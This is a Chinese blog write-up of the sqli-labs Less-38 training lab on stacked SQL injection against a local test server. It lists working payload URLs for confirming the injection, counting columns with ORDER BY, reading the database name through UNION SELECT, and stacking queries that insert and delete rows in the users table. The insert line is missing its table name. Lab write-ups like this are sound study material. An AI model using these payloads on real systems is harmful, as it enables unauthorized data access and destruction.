sql_lab之sqli中的堆叠型注入(less-38)

爱喝水的泡泡2023-12-27 12:43

堆叠注入(less-38)

1.判断注入类型

http://127.0.0.3/less-38/?id=1' and 1=2 -- s 没有回显

http://127.0.0.3/less-38/?id=1' and 1=1 -- s 有回显

则说明是单字节'注入

2.查询字段数

http://127.0.0.3/less-38/?id=1' order by 4 -- s 报错

http://127.0.0.3/less-38/?id=1' order by 3 -- s 有回显

说明字段数为3

3.判断回显点

http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s

4.查询数据库

http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s

接下来的步骤可以用联合查询进行查询

堆叠注入攻击

(1)在users表中添加一个用户

http://127.0.0.3/less-38/?id=1'; insert into values(17,'gao','a123456') -- s

证明添加成功

(2)在users表中删除一个用户

http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' -- s

表中没有gao这个用户,说明删除成功

相关推荐
齐鲁大虾3 分钟前
SQL Server 和 MySQL的区别
数据库·mysql
川石课堂软件测试38 分钟前
Android和iOS APP平台测试的区别
android·数据库·ios·oracle·单元测试·测试用例·cocoa
Codeking__1 小时前
Redis的value类型介绍——list
数据库·redis·缓存
香气袭人知骤暖1 小时前
MVCC为什么不能完全解决幻读问题
数据库·oracle
东方巴黎~Sunsiny1 小时前
mysql大表空间整理注意点
数据库·mysql
難釋懷1 小时前
Redis简单介绍
数据库·redis·缓存
lifejump1 小时前
Pikachu | SQL-inject
数据库·sql
C-20022 小时前
Casdoor 容器部署并实现 JumpServer 对接 CAS
数据库
ChineHe2 小时前
Redis数据类型篇003_详解Lists列表类型及其命令
数据库·redis·缓存
AllData公司负责人2 小时前
AllData数据中台-数据同步平台集成开源项目Seatunnel-Web,完成Mysql到Doris同步流程
数据库·mysql·开源
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03网站改了域名,如何查找?04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06【踩坑笔记】50系显卡适配的 PyTorch 安装072025-04-03 Latex学习1——本地配置Latex + VScode环境08Claude Code 2.1.2 升级报错?别折腾了,一行命令搞定09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10CentOS的ISO镜像下载